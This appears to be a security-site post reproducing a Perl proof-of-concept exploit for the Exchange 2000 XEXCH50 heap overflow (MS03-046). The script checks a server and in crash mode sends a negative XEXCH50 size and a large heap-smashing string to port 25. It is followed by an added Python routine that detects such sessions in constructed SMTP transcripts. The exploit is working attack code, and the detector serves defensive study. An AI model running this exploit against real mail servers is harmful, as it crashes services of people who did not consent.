
Exchange 2000 XEXCH50 Heap Overflow PoC exploit code

2004-9-29 20:05 | Submitted by: security

#!/usr/bin/perl -w
####################
# ms03-046.pl - hdm metasploit com
# This vulnerability allows a remote unauthenticated user to overwrite big chunks
# of the heap used by the inetinfo.exe process. Reliably exploiting this bug is
# non-trivial; even though the entire buffer is binary safe (even nulls) and can be
# just about any size, the actual code that crashes varies widely with each request.
# During the analysis process, numerous combinations of request size, concurrent
# requests, pre-allocations, and alternate trigger routes were examined and not a
# single duplicate of location and data offset was discovered. Hopefully the magic
# combination of data, size, and setup will be found to allow this bug to be reliably
# exploited.
# minor bugfix: look for 354 Send binary data

use strict;
use IO::Socket;

my $host = shift() || usage();
my $mode = shift() || "CHECK";
my $port = 25;

if (uc($mode) eq "CHECK") { check() }
if (uc($mode) eq "CRASH") { crash() }
usage();

sub check
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    print $s "XEXCH50 2 2\r\n";
    my $res = <$s>;
    close($s);

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] This system is vulnerable: $host:$port\n";
    exit(0);
}

sub crash
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    # the negative value allows us to overwrite random heap bits
    print $s "XEXCH50 -1 2\r\n";
    my $res = <$s>;

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] Sending massive heap-smashing string...\n";
    print $s ("META" x 16384);

    # sometimes a second connection is required to trigger the crash
    $s = SMTP($host, $port);
    exit(0);
}

sub usage
{
    print STDERR "Usage: $0 <host> [CHECK|CRASH]\n";
    exit(0);
}

# Open a TCP session to the SMTP port, confirm it looks like Exchange and
# walk through HELO / MAIL FROM / RCPT TO so that XEXCH50 can be issued.
sub SMTP
{
    my ($host, $port) = @_;
    my $s = IO::Socket::INET->new
    (
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp"
    ) || return(undef);

    my $r = <$s>;
    return undef if !$r;

    if ($r !~ /Microsoft/)
    {
        chomp($r);
        print STDERR "[*] This does not look like an exchange server: $r\n";
        return(undef);
    }

    print $s "HELO X\r\n";
    $r = <$s>;
    return undef if !$r;

    print $s "MAIL FROM: DoS\r\n";
    $r = <$s>;
    return undef if !$r;

    print $s "RCPT TO: Administrator\r\n";
    $r = <$s>;
    return undef if !$r;

    return($s);
}
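The script's two checks give a defender the same two signals to look for in mail-gateway or IDS captures: an XEXCH50 command issued before any successful AUTH (a patched server only accepts the verb after NTLM authentication), and a negative announced size. The following detection routine is an added example, not part of the original post or of ms03-046.pl. It assumes a constructed transcript format with "C:" for client lines and "S:" for server lines; the sample sessions and the server reply texts are constructed, and real logs will need their own parser.

```python
"""Flag unauthenticated or malformed XEXCH50 use in captured SMTP sessions.

Added example, not part of the original post or of ms03-046.pl. Assumes a
constructed "C: ..." / "S: ..." transcript format; adapt the parser to real logs.
"""
import re
from typing import Dict, List, Union

# XEXCH50 <size> <flags>: the first argument is the announced payload size.
XEXCH50_RE = re.compile(r"^XEXCH50\s+(-?\d+)(?:\s+\S+)?\s*$", re.IGNORECASE)
AUTH_RE = re.compile(r"^AUTH\b", re.IGNORECASE)
LINE_RE = re.compile(r"^([CS]):\s?(.*)$")

Findings = Dict[str, Union[bool, List[int]]]


def analyze_session(transcript: str) -> Findings:
    """Walk one SMTP session and collect XEXCH50-related observations.

    xexch50_before_auth:   XEXCH50 issued before any successful (235) AUTH.
    xexch50_negative_size: the announced size was negative.
    server_accepted:       the server answered XEXCH50 with 354, i.e. it is
                           willing to read the payload from that session.
    sizes:                 every announced size, for threshold reporting.
    """
    findings: Findings = {
        "xexch50_before_auth": False,
        "xexch50_negative_size": False,
        "server_accepted": False,
        "sizes": [],
    }
    authenticated = False
    auth_pending = False     # inside an AUTH exchange (334 challenge rounds)
    xexch50_pending = False  # waiting for the server's reply to XEXCH50

    for raw in transcript.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        side, text = m.group(1), m.group(2).strip()

        if side == "S":
            if auth_pending:
                if text.startswith("235"):
                    authenticated = True
                    auth_pending = False
                elif not text.startswith("334"):
                    auth_pending = False  # 4xx/5xx: authentication failed
            elif xexch50_pending and text.startswith("354"):
                findings["server_accepted"] = True
            xexch50_pending = False
            continue

        # Client side. Base64 blobs of an in-progress AUTH are not commands.
        if auth_pending:
            continue
        if AUTH_RE.match(text):
            auth_pending = True
            continue
        x = XEXCH50_RE.match(text)
        if x:
            size = int(x.group(1))
            findings["sizes"].append(size)
            if not authenticated:
                findings["xexch50_before_auth"] = True
            if size < 0:
                findings["xexch50_negative_size"] = True
            xexch50_pending = True
    return findings


def is_suspicious(findings: Findings) -> bool:
    """Unauthenticated XEXCH50 or a negative size alerts on its own;
    server_accepted on top of that means the host still looks unpatched."""
    return bool(findings["xexch50_before_auth"] or findings["xexch50_negative_size"])


# Constructed transcripts (not captured traffic); only the reply codes matter.
SESSION_UNPATCHED = """\
S: 220 mail.example.test Microsoft ESMTP MAIL Service ready
C: HELO X
S: 250 mail.example.test Hello [10.0.0.5]
C: MAIL FROM: DoS
S: 250 2.1.0 Sender OK
C: RCPT TO: Administrator
S: 250 2.1.5 Administrator
C: XEXCH50 -1 2
S: 354 Send binary data
"""

SESSION_PATCHED = """\
S: 220 mail.example.test Microsoft ESMTP MAIL Service ready
C: HELO X
S: 250 mail.example.test Hello [10.0.0.5]
C: XEXCH50 2 2
S: 504 Need to authenticate first
"""

SESSION_AUTHENTICATED = """\
S: 220 mail.example.test Microsoft ESMTP MAIL Service ready
C: EHLO X
S: 250 OK
C: AUTH NTLM
S: 334 ntlm supported
C: TlRMTVNTUAAB...
S: 334 TlRMTVNTUAAC...
C: TlRMTVNTUAAD...
S: 235 2.7.0 Authentication successful
C: XEXCH50 2 2
S: 354 Send binary data
"""
```

Run `analyze_session()` over each captured session and raise an alert when `is_suspicious()` is true; the `server_accepted` flag on an unauthenticated session is the stronger finding, since it is the same 354 continuation the script's CHECK mode treats as proof that the server is unpatched, while an authenticated XEXCH50 followed by 354 is the expected behaviour of a patched host.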
